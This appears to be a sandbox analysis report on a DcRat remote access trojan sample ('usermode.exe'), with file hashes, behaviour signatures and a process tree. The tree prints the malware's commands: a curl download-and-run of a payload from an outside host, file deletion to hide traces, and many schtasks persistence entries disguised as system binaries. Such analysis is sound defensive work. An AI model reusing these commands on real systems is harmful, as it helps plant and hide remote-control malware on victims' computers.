Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-12-2024 18:30
Static task
static1
Behavioral task
behavioral1
Sample
usermode.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
usermode.exe
Resource
win10v2004-20241007-en
General
-
Target
usermode.exe
-
Size
671KB
-
MD5
0f1700ee21d3f50876ba87ba59b5362c
-
SHA1
0204c433d0529811f23b71582da12e4276b3439f
-
SHA256
92c13c55b6e2afc22881d1bd9cbea837d7f2dbc3e1c17c194608f2f86d0cc597
-
SHA512
6ac8306aebf8161019df51b26078f3c993aeda3ecb9d4510e67fe788555d91a8453943136568bc643643b9fdea2983771fe35eecff47cafcc577aec789ef1f89
-
SSDEEP
12288:RZco5avwoS8/jtVoMpaSU5WflFr5//EmnBPG2pptCA:WFS8/eS4WflFr5//EmnVrbt
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1456 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2984 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4080 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3768 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3400 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1292 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 720 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1512 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5016 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4468 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4020 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4088 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4464 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4376 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1612 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4352 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4276 4280 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5096 4280 schtasks.exe 98 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation client.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe -
Executes dropped EXE 3 IoCs
pid Process 2644 client.exe 4588 chainreviewwinrefSvc.exe 4940 dwm.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Common Files\System\fontdrvhost.exe chainreviewwinrefSvc.exe File created C:\Program Files\Common Files\System\5b884080fd4f94 chainreviewwinrefSvc.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Speech\client.exe curl.exe File created C:\Windows\L2Schemas\dwm.exe chainreviewwinrefSvc.exe File created C:\Windows\L2Schemas\6cb0b6c459d5d3 chainreviewwinrefSvc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings client.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings chainreviewwinrefSvc.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4080 schtasks.exe 3400 schtasks.exe 1512 schtasks.exe 4468 schtasks.exe 4352 schtasks.exe 5096 schtasks.exe 3768 schtasks.exe 1292 schtasks.exe 720 schtasks.exe 4020 schtasks.exe 4464 schtasks.exe 4376 schtasks.exe 1456 schtasks.exe 2984 schtasks.exe 5016 schtasks.exe 4088 schtasks.exe 1612 schtasks.exe 4276 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4588 chainreviewwinrefSvc.exe 4940 dwm.exe 4940 dwm.exe 4940 dwm.exe 4940 dwm.exe 4940 dwm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4588 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 4940 dwm.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 3916 wrote to memory of 3532 3916 usermode.exe 84 PID 3916 wrote to memory of 3532 3916 usermode.exe 84 PID 3532 wrote to memory of 3968 3532 cmd.exe 85 PID 3532 wrote to memory of 3968 3532 cmd.exe 85 PID 3916 wrote to memory of 5064 3916 usermode.exe 86 PID 3916 wrote to memory of 5064 3916 usermode.exe 86 PID 3916 wrote to memory of 3988 3916 usermode.exe 87 PID 3916 wrote to memory of 3988 3916 usermode.exe 87 PID 3916 wrote to memory of 5028 3916 usermode.exe 88 PID 3916 wrote to memory of 5028 3916 usermode.exe 88 PID 3916 wrote to memory of 5056 3916 usermode.exe 90 PID 3916 wrote to memory of 5056 3916 usermode.exe 90 PID 5056 wrote to memory of 2644 5056 cmd.exe 91 PID 5056 wrote to memory of 2644 5056 cmd.exe 91 PID 5056 wrote to memory of 2644 5056 cmd.exe 91 PID 2644 wrote to memory of 5000 2644 client.exe 94 PID 2644 wrote to memory of 5000 2644 client.exe 94 PID 2644 wrote to memory of 5000 2644 client.exe 94 PID 3916 wrote to memory of 2348 3916 usermode.exe 95 PID 3916 wrote to memory of 2348 3916 usermode.exe 95 PID 5000 wrote to memory of 1412 5000 WScript.exe 105 PID 5000 wrote to memory of 1412 5000 WScript.exe 105 PID 5000 wrote to memory of 1412 5000 WScript.exe 105 PID 1412 wrote to memory of 4588 1412 cmd.exe 107 PID 1412 wrote to memory of 4588 1412 cmd.exe 107 PID 4588 wrote to memory of 4540 4588 chainreviewwinrefSvc.exe 126 PID 4588 wrote to memory of 4540 4588 chainreviewwinrefSvc.exe 126 PID 4540 wrote to memory of 1596 4540 cmd.exe 128 PID 4540 wrote to memory of 1596 4540 cmd.exe 128 PID 4540 wrote to memory of 3356 4540 cmd.exe 129 PID 4540 wrote to memory of 3356 4540 cmd.exe 129 PID 4540 wrote to memory of 4940 4540 cmd.exe 133 PID 4540 wrote to memory of 4940 4540 cmd.exe 133 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\usermode.exe"C:\Users\Admin\AppData\Local\Temp\usermode.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\system32\curl.execurl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe3⤵
- Drops file in Windows directory
PID:3968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:5064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:3988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:5028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\Speech\client.exeC:\Windows\Speech\client.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt/chainreviewwinrefSvc.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WkJsgmolSG.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\system32\chcp.comchcp 650018⤵PID:1596
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3356
-
-
C:\Windows\L2Schemas\dwm.exe"C:\Windows\L2Schemas\dwm.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe2⤵PID:2348
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1456
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Users\Default User\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Program Files\Common Files\System\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3768
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Common Files\System\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\System\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Windows\L2Schemas\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\L2Schemas\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Windows\L2Schemas\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Saved Games\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4468
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Admin\Saved Games\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Saved Games\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4088
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\ComponentCrt\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\ComponentCrt\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4376
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\ComponentCrt\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 9 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 14 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5096
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98B
MD54dafd9e9509ac96be6aa5baec659da4d
SHA1a091552663ddea89536560f232b8339f318c9cbc
SHA2560c53b640295abd25e8387957941e29f5c4e765376365409164ac39e3365a6ccf
SHA512d290c162347e236e0e197c52afc4f4b33f1eba2498dfe2ad86c414c87ab70c9fbbd2132cd08bfb4137e8555a095ca9acb6675727a4a5f65ccc46141c16698132
-
Filesize
1.8MB
MD511cca9e2c6dc9c2a728b89e7314ec26a
SHA158aec3b662a1c4e8b43cc454d90813ac89b5e612
SHA256300072795259e7b2baa69a7a3d19ffea1844dffc391e710c654aa1b66b0e2197
SHA512fb1fcff1c94e73b1227f65b237639e25604d614cfe365f2108bbbfdb489b97410fdc17411b8f00fc5b8f57d51080b4496010537a6a4ff9b15b7bdd24f89d0df7
-
Filesize
207B
MD5b292d233456b16f26abc1aa07c9f5de0
SHA17b025705136101b5618d81d8ebf472335eebde43
SHA256e75d13d4b079fafbd413fa8182c270f1f0f41b1b19b3469db12de226fed67b2d
SHA5121c9c3846ab0e392dc6833de2a9238c91b6042b5095521196a3ceae8830edf7fb6d73118ed023b2e2daf287a48084fa8ee40241248a231cf668d5cc5e8f947ee4
-
Filesize
204B
MD5d9c5a23072717dace43dab152b0ffb73
SHA184985a49f1f7227a8fd9636174224629b2df738a
SHA2563fb026ea26d38181b0c14bba28da20c68f15c0209bf7862fa7203c1e3620795f
SHA512d9f416f54dd249b78d14af48b884b6bfec7053c1efd12683827cab603a1e09431c7d75af24e8d995309566cbbe0d38d42b06bed558318091070fe967e289e730
-
Filesize
2.1MB
MD5bf4f13d82d217ed69d80124c50d9441c
SHA1b7ee7d109f61371342e924e6a0c3505347dd318f
SHA25651890bfc6f223014ff16f4bfa6ace8e2d2ec3c81eb6965406813b9ca32b08508
SHA5121ba17e55d6d1f6fda99daffe3f11f995d5e8434901b2aea9105728ccbff1b81727d96bf8811a62e8367fca0ec23bdea331165b001088b183281164269668d2f4